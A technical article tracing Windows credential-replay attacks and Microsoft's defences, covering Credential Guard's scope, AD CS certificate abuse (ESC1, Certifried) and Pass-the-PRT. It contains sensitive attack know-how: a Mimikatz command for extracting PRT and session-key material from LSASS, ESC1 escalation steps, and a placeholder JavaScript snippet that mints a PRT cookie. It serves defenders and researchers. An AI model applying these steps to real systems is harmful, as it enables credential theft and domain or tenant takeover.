The Windows architecture that runs a Type-1 hypervisor below the normal Windows kernel and partitions user mode into VTL0 (the normal partition) and VTL1 (the isolated partition). VTL1 hosts trustlets that the hypervisor protects from VTL0 inspection, even from kernel-mode VTL0 code. VBS is the substrate for Credential Guard, HVCI, the System Guard secure-launch chain, and the secure kernel. The Windows feature that relocates NT hashes, Kerberos TGT session keys, and "credentials stored by applications as domain credentials" from the in-VTL0 LSASS to the in-VTL1 LSAISO trustlet, so that the credential cache is unreadable from any VTL0 process or driver. Shipped in Windows 10 RTM (July 2015); default-enabled on hardware-eligible domain-joined non-DC systems in Windows 11 22H2 (September 2022) [@ms-learn-credential-guard]. The isolated-user-mode LSA process (`lsaiso.exe`) that holds Credential Guard's protected credential material. Runs in VTL1, unreadable from VTL0 kernel or user processes. Communicates with the VTL0 LSASS through a small RPC surface for authorised authentication operations only.

What does Credential Guard isolate? The Microsoft Learn page is unambiguous: "Credential Guard prevents credential theft attacks by protecting NTLM password hashes, Kerberos Ticket Granting Tickets (TGTs), and credentials stored by applications as domain credentials." [@ms-learn-credential-guard] Those three categories are also the three categories the previous three generations of the family targeted. Pass-the-Hash hits NTLM password hashes. Pass-the-Ticket hits Kerberos TGTs. Overpass-the-Hash hits NTLM password hashes promoted into Kerberos. Credential Guard moves all three out of VTL0 LSASS into VTL1 LSAISO. On a hardware-eligible domain-joined Windows 10/11 system with Credential Guard enabled, all three attacks return empty buffers.

The institutional importance of the change is that under Microsoft's own Windows Security Servicing Criteria, Credential Guard is a security boundary -- which means a bypass is a CVE-class vulnerability rather than a documentation gap.

The criteria's load-bearing definitions: "A security boundary provides a logical separation between the code and data of security domains with different levels of trust" and "Does the vulnerability violate the goal or intent of a security boundary or a security feature?" [@msrc-windows-servicing-criteria] Pre-2015 Pass-the-Hash defenses were documentation; Credential Guard is the first defense the criteria treats as CVE-class under the boundary "admin -> VBS (LSAISO trustlet)."

flowchart TD subgraph VTL0[VTL0 normal partition] A[User processes] B[LSASS] K[VTL0 kernel] end subgraph VTL1[VTL1 isolated partition] L[LSAISO trustlet] SK[Secure kernel] end H[Hypervisor] A --> B K --> B B -- authorised RPC only --> L H --> VTL0 H --> VTL1 SK --> L K -. blocked by HVCI .-> L

What does Credential Guard not isolate? This is the load-bearing question for the rest of the article. The same Microsoft Learn page enumerates four caveats, each verbatim.

First, the Active Directory database and the SAM. "Credential Guard doesn't provide protections for the Active Directory database or the Security Accounts Manager (SAM)." [@ms-learn-credential-guard] This is the DCSync gap: an attacker with the right replication privileges can ask a DC to hand over every hash in the directory, and Credential Guard cannot intervene because the data is being released through a legitimate, authorised API rather than being read from LSASS.

Second, domain controllers. "Enabling Credential Guard on domain controllers isn't recommended. Credential Guard doesn't provide any added security to domain controllers." [@ms-learn-credential-guard] The KDC must read the krbtgt account's long-term key in cleartext to issue tickets; the architectural exception is intrinsic to Kerberos rather than a Microsoft oversight.

Third, application credentials outside the "domain credentials" scope. Certificate private keys held by CryptoAPI key containers, third-party authentication package secrets, and -- the one this article eventually argues is the most consequential -- the Primary Refresh Token material held by the CloudAP authentication plug-in, are all out of scope by construction.

Fourth, and most importantly, the institutional acknowledgment of the supersession pattern. Microsoft Learn reproduces it verbatim on the same page, the prophecy the rest of this article spends its time documenting being fulfilled:

While Credential Guard is a powerful mitigation, persistent threat attacks will likely shift to new attack techniques, and you should also incorporate other security strategies and architectures. -- Microsoft Learn, *Credential Guard overview* [@ms-learn-credential-guard]

That sentence, written about the 2015 Credential Guard architecture, accurately predicts the 2021-2022 shift to Pass-the-Certificate and the 2020-present shift to Pass-the-PRT. It is Microsoft's own structural prediction that the family will continue to evolve to the next artefact Credential Guard's verbatim scope does not cover. The rest of this article reads as the unfolding of that prediction.

The Kerberos KDC must read the krbtgt account's long-term key to encrypt the TGT issued in every AS-REP. That key has to be available to the LSA process in cleartext, on every DC, on every ticket issuance, by protocol. Putting krbtgt behind LSAISO would mean issuing every TGT through an inter-trust-level RPC call -- a non-trivial performance penalty on every authentication in an Active Directory forest -- and would not actually close the architectural gap, because the trustlet itself would still need to do the cleartext work that LSASS does today. The exception is honest about an architectural reality rather than concealing it.

PPL and Credential Guard are complementary, not alternatives. itm4n's analysis [@itm4n-lsass-runasppl] makes the case carefully: RunAsPPL raises the bar from "any admin process can read LSASS" to "any signed driver can read LSASS," and Credential Guard closes the signed-driver bypass with hardware-rooted hypervisor isolation. They stack. The 2026 best-practice Windows endpoint has both turned on.

The default-enablement window shows how long this took to land. Credential Guard shipped enabled-by-policy in Windows 10 RTM in 2015, but did not become default-enabled on hardware-eligible domain-joined non-DC systems until Windows 11 22H2 in September 2022 [@ms-learn-credential-guard]. Seven years of uneven deployment.

Note: Four residuals from the Microsoft Learn page: the Active Directory database and the SAM are out of scope; domain controllers are out of scope by recommendation; application credentials outside the "domain credentials" category (certificates, CloudAP material, third-party authentication packages) are out of scope by construction; and persistent threats are expected to shift to new attack techniques. Each residual maps to a later generation of this article: AD database -> DCSync; certificates -> Pass-the-Certificate; CloudAP -> Pass-the-PRT.

Each new credential type needs its own isolation boundary. Credential Guard isolates NT hashes and TGT session keys. It does not isolate certificate private keys, because in 2015 nobody was replaying certificates at scale. And it does not isolate the Primary Refresh Token, because in 2015 the Primary Refresh Token did not yet exist.

Key idea: Each new credential type needs its own isolation boundary. The pattern is reusable but does not transfer automatically -- and the gap between "what fits in the boundary" and "what credentials Windows actually uses" is exactly the territory where the next attack generation grows.

7. Pass-the-Certificate: The Predictable Response

If the NT hash is isolated and RC4-HMAC is banned, what is the next long-term credential Windows accepts? The answer was hiding in plain sight: every Active-Directory-integrated enterprise had been running Microsoft's PKI since 2008, and almost every PKI deployment had at least one template-level catastrophe.

On June 17, 2021, Will Schroeder and Lee Christensen posted "Certified Pre-Owned" on Medium, with the accompanying 143-page whitepaper [@specterops-certified-pre-owned] [@specterops-certified-pre-owned-pdf]. The post named ESC1 through ESC8 in a single document, with paired DETECT and PREVENT recommendations, and shipped three pieces of tooling at the same Black Hat USA 2021 cycle: Certify (offensive enrollment), ForgeCert (golden-certificate forging using a stolen CA private key), and PSPKIAudit (defensive enumeration). The Medium post's tone was unsubtle:

Of note, nearly every environment with AD CS that we've examined for domain escalation misconfigurations has been vulnerable. It's hard for us to overstate what a big deal these issues are. -- Will Schroeder and Lee Christensen, *Certified Pre-Owned* [@specterops-certified-pre-owned]

The ESC catalog organises certificate misconfigurations by the abuse primitive they enable. ESC1 is the canonical example: a published certificate template that allows the enrollee to supply the Subject Alternative Name, contains a client-authentication Extended Key Usage, has permissive enrollment rights, and has no effective approval gates.

An attacker who can enroll for such a template requests a certificate naming a victim principal -- say, the domain administrator -- in the SAN. The certificate's private key is now the attacker's. PKINIT-authenticate to the KDC with that certificate, and the KDC issues a TGT for the named principal. Domain escalation, in three commands.

Microsoft's enterprise PKI. Issues X.509 certificates from administrator-defined templates that pin a certificate's permitted uses (Extended Key Usages), its enrollment authorisation rules, its subject and SAN generation policy, and its revocation behaviour. Ships as a Windows Server role; deployed in essentially every Active-Directory-integrated enterprise. Kerberos pre-authentication using a certificate's private key in place of a long-term symmetric key. Specified by RFC 4556 (L. Zhu and B. Tung, Microsoft and Aerospace, June 2006) [@rfc-4556]. The certificate's UPN SAN (or its dNSHostName for computer accounts) maps the certificate to the principal whose TGT the KDC will issue. PKINIT is the protocol surface most commonly exercised by Pass-the-Certificate against domain controllers that support certificate-based authentication. The Windows TLS implementation. Supports TLS client-certificate authentication, which authenticated LDAPS uses. When a domain controller does not support PKINIT (Schroeder + Christensen documented this case in the original catalog; AlmondOffSec built tooling for it), an attacker can authenticate to LDAPS over Schannel with a stolen client certificate and perform high-privilege LDAP operations without traversing the KDC. The technique of authenticating to Active Directory with a stolen X.509 certificate's private key, via PKINIT to the KDC or via Schannel client-certificate authentication to LDAPS. Named in this form by Yannick Méheut's PassTheCert tool and blog post (May 2022) [@almondoffsec-passthecert-github] [@almondoffsec-passthecert-blog], though the technique class was catalogued by Schroeder and Christensen eleven months earlier [@specterops-certified-pre-owned]. Tool of record: Certify (C#), Certipy (Python, ESC1-ESC16 [@certipy-wiki-privesc]), and Rubeus PKINIT mode. sequenceDiagram participant Atk as Attacker (user) participant CA as Enterprise CA participant KDC Atk->>CA: Enrol for template ESC1, SAN field set to Domain Administrator CA-->>Atk: X.509 certificate plus private key Note over Atk: Now holds a certificate naming the victim principal Atk->>KDC: AS-REQ with PKINIT pre-auth using the stolen private key KDC->>KDC: Validate certificate, map SAN to victim principal KDC-->>Atk: AS-REP with TGT for victim principal Atk->>KDC: TGS-REQ for any service KDC-->>Atk: TGS-REP service ticket

The CVE-class case lands on May 10, 2022. Oliver Lyak of IFCR discloses Certifried, CVE-2022-26923, an Active Directory Domain Services elevation-of-privilege vulnerability in which the combination of three Microsoft defaults -- ms-DS-MachineAccountQuota = 10 (any authenticated user can add up to 10 computer accounts to the domain), the default Machine template (which a computer account can enroll for), and the KDC's permissive dNSHostName-to-SAN binding logic -- lets any authenticated user obtain a certificate for any computer account in the forest, including domain controllers.

PKINIT-authenticate as a domain controller, and the KDC issues you a TGT for the DC; from there, DCSync extracts the krbtgt key and the domain is yours. Domain escalation from any authenticated user, with the only required misconfiguration being Microsoft's defaults [@nvd-cve-2022-26923] [@semperis-cve-2022-26923].

The defensive response shipped the same day. Microsoft published KB5014754 on May 10, 2022 -- coordinated disclosure, with the patch shipping in the same window as the CVE -- introducing a new X.509 extension szOID_NTDS_CA_SECURITY_EXT (OID 1.3.6.1.4.1.311.25.2) that carries the requesting principal's SID at certificate issuance.

The KDC's new strong-mapping logic refuses certificates that fail one of four conditions: the SID extension is present and matches; an issuer-serial mapping is present; a Subject Key Identifier mapping is present; or a SHA1-public-key mapping is present. The KB's load-bearing sentence: "In Full Enforcement mode, if a certificate fails the strong (secure) mapping criteria (see Certificate mappings), authentication will be denied." [@ms-kb5014754]

The KB5014754 change-log preserves a forensic artefact of the coordinated-disclosure timeline that is easy to miss. The current change-log row reads, verbatim: "9/10/2025 - Corrected the Enforcement mode date from September 10, 2025, to September 9, 2025." [@ms-kb5014754] An off-by-one date correction, captured in the public KB. The kind of detail that only shows up when a small team has had to ship a date repeatedly against a multi-year audit-to-enforcement schedule.

The enforcement timeline tells you how long even a CVE-class fix took to drive through deployment. Audit mode (May 10, 2022). Enforcement mode with a registry escape that admins could use to revert to compatibility (February 11, 2025). Final cutover with no escape (September 9, 2025) [@ms-kb5014754]. Three years and four months between the patch and the day Microsoft stopped accepting non-strong certificate mappings. Faster than the Credential Guard default-enablement window, but still measured in years.

The naming history deserves a disambiguation. The catalog -- ESC1 through ESC8, the full taxonomy of AD CS misconfigurations -- is Schroeder and Christensen, June 2021 [@specterops-certified-pre-owned]. The wire-level technique name "Pass-the-Certificate" is popularised by AlmondOffSec's PassTheCert PoC (Yannick Méheut, May 4, 2022), which targets LDAP/S via Schannel client-cert authentication when PKINIT is unavailable, as a fallback path for environments where domain controllers do not support certificate-based Kerberos pre-authentication [@almondoffsec-passthecert-github] [@almondoffsec-passthecert-blog]. The blog post documents the KDC_ERR_PADATA_TYPE_NOSUPP error path that diverts the PKINIT-blocked attacker into Schannel.

The AlmondOffSec blog post acknowledges the social attribution of the term: "Note for Googlers: this tool extends the notion of Pass the Certificate, thus dubbed by @_nwodtuhs in his Twitter thread on AD CS and PKINIT." [@almondoffsec-passthecert-blog] The technique name is socially attributed; the catalog framing is editorial.

Note: A common shorthand says that KB5014754 bound NTOWFs to Kerberos, and that this is what forced attackers to shift to certificates. That arrow runs backwards in time. KB5014754 is the response to Certifried, not the cause of Pass-the-Certificate. The technique class was catalogued by Schroeder and Christensen in June 2021, eleven months before KB5014754 shipped, and the PassTheCert tool that gave the technique its wire-level name appeared six days before Certifried's disclosure. The shift to certificates happened because certificates were the next long-term credential type Credential Guard did not isolate.

What does KB5014754 actually close? Three specific CVEs in the Certifried family: CVE-2022-26923 (the original SID-spoof Certifried disclosure), CVE-2022-26931 (UPN / sAMAccountName collision spoof), and CVE-2022-34691 (the certificate-pre-dating-account-creation case) [@ms-kb5014754]. What does it not close? The broader ESC2 through ESC8 catalog, which is administrative hardening rather than CVE-class control. And it does not close ESC9 through ESC16, which were enumerated after KB5014754 shipped and include cases like the CT_FLAG_NO_SECURITY_EXTENSION template flag that exempts a template from the very SID extension the patch introduced [@specterops-certs-patches-2022] [@certipy-wiki-privesc].

The current state of the catalog: as of the 2025 Certipy 5.x documentation, ESC1 through ESC16 is the practitioner enumeration, with each technique characterised by a template-level, ACL-level, CA-administrator-level, NTLM-relay-level, SID-extension-level, or mapping-level abuse primitive [@certipy-wiki-privesc]. Microsoft Defender for Identity's certificates posture assessment tracks nine distinct ESC numbers as of the 2025 documentation -- ten posture assessments, because ESC4 owner and ESC4 ACL are tracked as separate sub-cases (ESC1, ESC2, ESC3, ESC4 owner, ESC4 ACL, ESC6 preview, ESC7, ESC8, ESC11, ESC15) [@ms-defender-id-certs]. Same pattern as Pass-the-Hash in 2012-2014: documentation tells administrators what to do; the structural exposure is downstream of how each enterprise built its templates years earlier.

ESC ID	Class	Closed by KB5014754
ESC1	Template -- enrollee supplies SAN, client-auth EKU, permissive enrollment	Partial: SID extension binds requester at issuance; ESC1 still works if the SID extension is absent
ESC2	Template -- enrollee supplies SAN, Any-Purpose or no EKU	No -- administrative hardening
ESC3	Template -- Certificate Request Agent enrollment-agent abuse	No -- administrative hardening
ESC4	ACL -- writeable template configuration	No -- administrative hardening
ESC6	CA -- `EDITF_ATTRIBUTESUBJECTALTNAME2` flag set on the CA	No -- CA-level hardening (was MS22-23, separately patched)
ESC8	NTLM relay -- HTTP enrolment endpoints reachable from low-privilege contexts	No -- relay-defence hardening
ESC9	Template -- `CT_FLAG_NO_SECURITY_EXTENSION` exempts template from the SID extension	No -- by design
ESC11	NTLM relay -- ICPR RPC endpoint without sign / seal	No -- relay-defence hardening
ESC16	CA -- security-extension disabled at the CA level	No -- CA-level hardening

Table 1. A representative slice of the ESC1-ESC16 catalog showing what KB5014754 closes and what remains administrative hardening [@specterops-certify-wiki] [@certipy-wiki-privesc] [@specterops-certs-patches-2022].

KB5014754 is a CVE-class fix for one sub-case. The broader ADCS catalog is administrative hardening. And the next credential type -- the one that defeats Credential Guard, Protected Users, and KB5014754 simultaneously -- was already shipping in commodity Mimikatz code by August 2020.

8. Pass-the-PRT: The CloudAP Frontier

By August 2020, Microsoft had two architectural defenses against credential replay that the security industry actually trusted: Credential Guard for local Active Directory credentials, and (eighteen months later) KB5014754 for the certificate-replay class. Then a Dutch security researcher named Dirk-jan Mollema published a 21-minute read that broke both, in the same paragraph, by stealing a different credential type.

The credential is the Primary Refresh Token. The two foundational write-ups are Mollema's "Abusing Azure AD SSO with the Primary Refresh Token" [@mollema-prt-abusing] and its follow-on "Digging further into the Primary Refresh Token" [@mollema-prt-digging], both posted in August 2020. The second post is the single most-cited primary source in the fifth generation of the family. Read it once and you understand why Pass-the-PRT is structurally different from everything that came before.

A PRT is an opaque refresh-token artifact issued by Microsoft Entra ID (formerly Azure AD) to a broker on Entra-joined or Hybrid-joined Windows devices, paired with a session key (an HMAC-SHA256 secret) used for proof-of-possession and bound to the device keys registered at device join.

The Microsoft Entra documentation describes the artefact precisely: "A Primary Refresh Token (PRT) is a key artifact of Microsoft Entra authentication ... Once issued, a PRT is valid for 90 days and is continuously renewed as long as the user actively uses the device." [@ms-entra-concept-prt] On Windows the PRT is renewed every four hours during sign-in. The device-key registration binds the PRT to the device that owns it -- and is what an attacker has to work around to use a stolen PRT on a different device.

The Microsoft Entra-issued long-lived refresh token for SSO on Entra-joined or Hybrid-joined Windows devices. Carries a session key (HMAC-SHA256) used to sign per-request `x-ms-RefreshTokenCredential` cookies, and binds to a device transport key registered at device join. Default lifetime is 90 days with sliding renewal as long as the user actively uses the device; an inactivity timeout governs when an idle PRT must be re-acquired [@ms-entra-concept-prt]. The PRT is the load-bearing artefact for Single Sign-On to every Entra-integrated resource the device's user can reach.

The PRT default lifetime is 90 days per the Microsoft Entra documentation, with renewal every four hours during Windows sign-in [@ms-entra-concept-prt]. The 14-day figure that sometimes appears in secondary references is the inactivity timeout on certain device states, not the PRT lifetime itself; this article uses the Microsoft Entra documentation's value to avoid the conflation.

Where the PRT lives is what makes the rest of the architecture work -- and what makes it vulnerable. The PRT is hybrid: issued and revoked cloud-side by Entra ID, stored and used client-side via the CloudAP authentication plug-in, which is loaded into LSASS like any other Windows authentication package.

The load-bearing structural fact is that CloudAP is in LSASS, not behind the LSAISO trustlet. Credential Guard's classical isolation does not extend to the CloudAP plug-in's working memory, because Credential Guard's scope is the three credential categories its design predates -- NT hashes, Kerberos TGTs, and "domain credentials" -- and the PRT is none of those [@mollema-prt-abusing].

The Windows authentication package (`cloudap.dll`, loaded into LSASS) that handles authentication against Microsoft Entra ID for Entra-joined and Hybrid-joined devices. Holds the device's Primary Refresh Token, its session key, and the derived material used to sign per-request PRT cookies. Sits inside LSASS in VTL0, *not* inside the LSAISO trustlet in VTL1; Credential Guard does not currently extend its isolation to CloudAP's working memory.

The mechanism, as Mollema and Delpy developed it through the second half of 2020, runs as follows. Mimikatz dpapi::cloudapkd /unprotect extracts the PRT (the encrypted-by-Entra refresh-token blob) and the session key from CloudAP's working memory.

The attacker constructs an x-ms-RefreshTokenCredential JWT carrying the PRT in the refresh_token claim, is_primary: true, and a request_nonce obtained by an unauthenticated POST against the Entra ID v1 token endpoint at https://login.microsoftonline.com/common/oauth2/token with form-encoded body grant_type=srv_challenge (the server-challenge nonce pattern used by the ROADtools roadtx prt reference implementation; the response is a JSON object with a Nonce field). The signature is HMAC-SHA256 over the JWT under the session key. The completed cookie is presented to login.microsoftonline.com from any machine, and Entra ID returns access and refresh tokens for any resource the original user can reach. Mollema's second post describes the collaboration that built the tooling:

Around the same time Benjamin Delpy took up my 'challenge' of recovering PRT data from `lsass` with mimikatz. We combined forces and ended up with tooling that is not only able to extract the PRT and associated cryptographic keys (such as the session key) from memory, but can also use these keys to create new SSO cookies or modify existing ones. -- Dirk-jan Mollema, *Digging further into the Primary Refresh Token* [@mollema-prt-digging]

The operational tooling closed quickly. Mollema's roadtx prt (part of ROADtools [@roadtools-github]) automates the full chain end-to-end -- extract the material, mint the cookie, complete the OAuth dance, hand the attacker an access token. The Mimikatz dpapi::cloudapkd command landed in the open-source repository the same window. Pass-the-PRT moved from research artefact to commodity tooling in months, not years.

sequenceDiagram participant Victim as Victim device (Entra-joined) participant Attacker as Attacker device participant Entra as login.microsoftonline.com Note over Victim: PRT plus session key held by CloudAP in LSASS Attacker->>Victim: mimikatz dpapi::cloudapkd /unprotect Victim-->>Attacker: PRT (encrypted blob) plus session key Attacker->>Entra: POST /common/oauth2/token grant_type=srv_challenge (unauthenticated) Entra-->>Attacker: request_nonce Note over Attacker: Build x-ms-RefreshTokenCredential JWT Note over Attacker: Sign HMAC-SHA256 with extracted session key Attacker->>Entra: POST /token with PRT cookie Entra-->>Attacker: Access and refresh tokens Attacker->>Attacker: Authenticate to any Entra resource as victim user

Now the analytical core. Pass-the-PRT defeats three Microsoft defenses simultaneously.

First, Credential Guard is out of scope. The CloudAP material is not an NT hash, not a Kerberos TGT, and not "credentials stored by applications as domain credentials" in the verbatim sense the Credential Guard documentation uses. Credential Guard's VBS-based isolation does not extend to CloudAP. The defense was designed in 2015 against the three credential types the family had then; the PRT is a credential type the family had not yet evolved into [@ms-learn-credential-guard].

Second, KB5014754 is out of scope. The PRT cookie does not traverse the KDC's certificate-mapping logic at all; it is a JWT signed by an HMAC and authenticated at the Entra ID token endpoint. The strong certificate mapping that Microsoft drove through five years of audit-to-enforcement timeline has no relevance to a credential that never touches the KDC [@ms-kb5014754].

Third, Protected Users is out of scope. Protected Users is an Active-Directory-only construct, enforced on Windows Server domain controllers and on AD-joined member devices. Entra ID is a separate identity provider with separate enforcement; the 240-minute TGT cap, the NTLM ban, and the RC4 ban that Protected Users enforces simply do not apply [@ms-protected-users].

The TPM-sealing finding is where the architectural pattern becomes most precise. Microsoft began sealing the PRT session key to a TPM-bound key on TPM-2.0-eligible hardware -- a defense that, in principle, makes the raw session key cryptographically non-exportable. Mollema's finding in the August 2020 second post is that the seal does not close the attack, because CloudAP holds derived PRT-cookie-signing material in its own working memory in LSASS, and the attacker only needs the derived material:

despite the session key of the PRT is stored in the TPM whenever possible, this doesn't prevent us from extracting the PRT and the required information to create SSO cookies. The result of this is that regardless of whether the PRT is protected by the TPM or not, with Administrator access it is possible to extract the PRT from LSASS and use the PRT on a different device than it was issued to. -- Dirk-jan Mollema, *Digging further into the Primary Refresh Token* [@mollema-prt-digging]

The structural reason the standard hardware-rooted defense pattern does not transfer: the attacker does not need the raw session key out of the TPM. They need only the in-memory derived material CloudAP itself uses to sign the cookies, and that derived material lives in the same address space Credential Guard does not isolate.

The TPM seals the key. CloudAP uses the key. Whatever CloudAP can read, an attacker with administrator and a memory-access primitive can also read. The defense pattern that worked for NT hashes (move them out of the address space) has not been applied to CloudAP -- and until it is, the TPM seal is a speed bump rather than a wall.

{` // Pedagogical demonstration of the JWT structure used in Pass-the-PRT // cookie minting. Uses placeholder values throughout; no real PRT material.

const base64url = (buf) => Buffer.from(buf).toString('base64') .replace(/=+$/, '').replace(/\+/g, '-').replace(/\//g, '_');

const header = { alg: 'HS256', ctx: 'AAAAAAAA' }; const payload = { // The PRT itself, an opaque refresh-token string Entra issued to the // device. In a real attack this comes from mimikatz dpapi::cloudapkd. refresh_token: 'AQABAAAAAAA...redacted...', // Marks this cookie as a primary refresh token cookie. is_primary: 'true', // Fresh nonce from an unauthenticated POST against the v1 token endpoint // at login.microsoftonline.com/common/oauth2/token with form body // grant_type=srv_challenge (returns JSON with Nonce field; the canonical // server-challenge pattern used by ROADtools roadtx prt). request_nonce: 'AwABAAEAAAAC...', iat: Math.floor(Date.now() / 1000), };

// HMAC-SHA256 over the JWT under the session key recovered from CloudAP. // Placeholder key for demonstration only. const sessionKey = Buffer.alloc(32); // 32 bytes of zeros (fake) const crypto = require('crypto');

const h = base64url(JSON.stringify(header)); const p = base64url(JSON.stringify(payload)); const sig = base64url( crypto.createHmac('sha256', sessionKey).update(h + '.' + p).digest() );

console.log('Header segment: ' + h); console.log('Payload segment: ' + p); console.log('Signature segment: ' + sig); console.log(); console.log('Full PRT cookie: ' + h + '.' + p + '.' + sig); // In a real attack the attacker would now POST this as the // x-ms-RefreshTokenCredential cookie to login.microsoftonline.com. `}

The current partial mitigations are worth enumerating, because none of them closes the gap.

Token Protection (a Conditional Access session control) attempts to ensure that only device-bound sign-in session tokens are accepted at the Entra ID token endpoint for protected resources. The Microsoft Learn page is explicit about both the design intent and the deployment limits: "Token Protection is a Conditional Access session control that attempts to reduce token replay attacks by ensuring only device bound sign-in session tokens, like Primary Refresh Tokens (PRTs), are accepted by Microsoft Entra ID when applications request access to protected resources." [@ms-entra-token-protection] As of the current documentation the supported resources are five named applications: Exchange Online, SharePoint Online, Microsoft Teams, Azure Virtual Desktop, and Windows 365. Browser applications are out of scope; "Token Protection currently supports native applications only. Browser-based applications are not supported." [@ms-entra-token-protection] Most Entra-integrated SaaS is unbound.

Continuous Access Evaluation (CAE) shortens the window during which a stolen PRT is operationally usable, by allowing the token endpoint to revoke tokens within minutes of a triggering signal (password change, risk-based detection, conditional-access policy update) [@ms-entra-cae]. CAE is evaluation-time, not isolation. It shortens the window between extraction and detection-driven revocation; it does not prevent extraction.

Hybrid-joined PRT renewal binding partially closes the cross-tenant case for hybrid Azure AD Join configurations, but does not address the same-tenant Pass-the-PRT case that Mollema's original 2020 posts described [@ms-entra-hybrid-join-plan].

The institutional acknowledgment of the supersession pattern is the verbatim Microsoft Learn sentence already quoted in section 6 [@ms-learn-credential-guard]: written about the 2015 Credential Guard architecture, it accurately predicts the 2020 Pass-the-PRT shift. The credential-replay family has reached the point where every Microsoft defense in the on-prem stack runs in parallel against an attack the on-prem stack cannot reach.

Key idea: Pass-the-PRT defeats Credential Guard, KB5014754, and Protected Users simultaneously because each defense was designed around a different long-term artefact, and the PRT is none of them. The architectural property -- a long-term authentication artefact reachable from the using process is replayable -- is unchanged. The artefact moved.

Six years after Mollema's disclosure, the TPM-resilience finding still holds. The CloudAP plug-in is still in LSASS. Credential Guard still does not extend its boundary. Pass-the-PRT remains the operational frontier in 2026.

9. The 5x5 Matrix and the Irregular Cadence

Five generations of attack. Five generations of defense. They map onto each other unevenly; the gaps are not five years.

The matrix below consolidates the lineage at a glance. Rows are the attack generations (in the order they entered the practitioner literature). Columns are the defense generations (in the order they shipped). Each cell records whether that defense closes that attack on a fully-deployed hardware-eligible 2026 Windows 11 endpoint with the control turned on. "Closed" means the attack returns empty buffers or fails authentication; "Partial" means the defense increases attacker cost or closes one sub-case; "Open" means the defense's design scope does not include that attack.

Attack \ Defense	Mitigating-PtH whitepapers (2012/2014)	Protected Users + RunAsPPL + Restricted Admin (2013-2014)	Credential Guard / LSAISO (2015)	KB5014754 strong mapping (2022)	Token Protection + CAE (2023-2025)
Pass-the-Hash (Ashton 1997, Ochoa 2008)	Open (documentation)	Partial (Protected Users members)	Closed (on enabled endpoints)	Open (not in scope)	Open (not in scope)
Pass-the-Ticket (Delpy 2011, Duckwall+Delpy 2014)	Open (documentation)	Partial (4-hour TGT cap for Protected Users)	Closed (TGT session key in LSAISO)	Open (not in scope)	Open (not in scope)
Overpass-the-Hash (Delpy / Metcalf 2014)	Open (documentation)	Partial (RC4 banned for Protected Users)	Closed (NT hash in LSAISO)	Open (not in scope)	Open (not in scope)
Pass-the-Certificate (Schroeder + Christensen 2021, Méheut 2022)	Open (documentation)	Open (cert keys outside scope)	Open (cert keys outside scope)	Partial (closes Certifried sub-case; ESC2-ESC16 remain)	Open (not in scope)
Pass-the-PRT (Mollema + Delpy 2020)	Open (Entra ID is separate IDP)	Open (Entra ID is separate IDP)	Open (CloudAP not in LSAISO)	Open (not in scope)	Partial (5 named resources; browser apps out of scope)

Table 2. The 5x5 attack/defense matrix. The union of every cell in the rightmost column of "Closed" entries is the set of attacks Microsoft's published 2026 defenses close on hardware-eligible non-DC endpoints with every control turned on; that set is precisely the first three rows.

The matrix makes the structure visible. No single defense closes all attacks, and no single attack is closed by all defenses. The union of every defense closes Pass-the-Hash, Pass-the-Ticket, and Overpass-the-Hash on hardware-eligible non-DC Windows 10/11 systems with all controls enabled. It partially closes Pass-the-Certificate (for the Certifried sub-case) and partially closes Pass-the-PRT (for five named resources). Both of the most recent generations remain operationally open against any deployment that does not run those specific controls -- which is most deployments.

The cadence is just as uneven as the matrix. The original input that prompted this article claimed "every Windows defense against credential replay buys about five years before the attack class evolves to the next credential type." Memorable. Also wrong. The actual timeline produces gaps from eleven months to eleven years, with one negative interval:

1997 -> 2008 (eleven years) for the Samba-patch -> Windows-native pivot. Pass-the-Hash existed for over a decade as a Unix-side novelty before Ochoa's LSASS-injection insight made it Windows-native.
2008 -> 2011 (three years) for the Mimikatz Pass-the-Ticket extension. The same memory-access primitive that animated IAM.EXE was retargeted at a different artefact.
2012/2014 -> 2015 (one to three years) for the Mitigating-PtH whitepapers -> Credential Guard pivot. Documentation took a year and a half to ship; the architectural counter took another.
2021 -> 2022 (eleven months) for the AD CS catalog -> KB5014754 response. Coordinated disclosure compressed this gap; Certifried's CVE-class status forced a CVE-class response.
2020 -> 2025+ (open-ended) for Pass-the-PRT with no Credential-Guard-equivalent shipped. As of the Windows 11 25H2 cycle there is no public roadmap for VBS-class isolation of CloudAP material.

The most striking gap is the 2020/2021 negative interval. Pass-the-PRT (Mollema, August 2020) and the AD CS catalog (Schroeder + Christensen, June 2021) are siblings rather than sequential; Pass-the-PRT predates Pass-the-Certificate as a named technique by ten months, even though the article treats them as Generation 4 and Generation 5 in narrative order. The Generation N -> N+1 framing is taxonomic, not strictly chronological. The reader needs this distinction to read the lineage accurately: the attack class evolves along the architectural property, not along the calendar.

Note: The "every Windows defense buys five years" framing is what you see if you select the cleanest pairings (Mitigating-PtH 2012/2014 to Credential Guard 2015 plus an artificial 2020-targeted "next attack"). When you look at the actual intervals, you see eleven years (1997-2008), three years (2008-2011), eleven months (2021-2022), and an open-ended interval (2020 onwards). The pattern is the architectural property persisting across artefact changes, not a calendar drumbeat.

The storage-class progression is the cleanest way to see the property hold across the lineage. Each row names the long-term artefact, where it lives, and which defense moved or shielded that storage class.

Generation	Long-term artefact	Storage location	Defense that isolated it	Status 2026
1A (1997 Samba)	NT hash (and LM hash)	Attacker-supplied hash (Samba `smbpasswd`)	"Do not store LAN Manager hash" policy (Vista default-on); SAM hash extraction still works	LM hash retired; NT hash extraction still works
1B (2008 Windows-native)	NT hash	LSASS credential cache	Credential Guard relocates to LSAISO	Closed on Credential-Guard-enabled endpoints
2 (2011 Mimikatz)	Kerberos TGT plus session key	LSASS Kerberos package	Credential Guard relocates to LSAISO	Closed on Credential-Guard-enabled endpoints
3 (2014)	NT hash promoted to RC4-HMAC Kerberos key	LSASS, same buffer as Pass-the-Hash	Credential Guard relocates to LSAISO; KB5021131 makes AES the default	Closed on Credential-Guard-enabled endpoints; RC4 deprecated in favour of AES [@ms-kb5021131]
4 (2021 AD CS catalog)	X.509 certificate private key	CryptoAPI key container, TPM, or smart card	TPM-resident or VSC-resident keys are cryptographically non-exportable; KB5014754 binds certificates to SIDs at issuance	Partial; ESC2-ESC16 misconfigurations remain administrative hardening
5 (2020 Pass-the-PRT)	PRT session key plus derived signing material	CloudAP plug-in in LSASS (session key optionally TPM-sealed)	None deployed; Token Protection partially shields five resources	Open

Table 3. Storage-class progression. Each attack generation targets the next long-term artefact whose storage location is not isolated by the previous generation's defense.

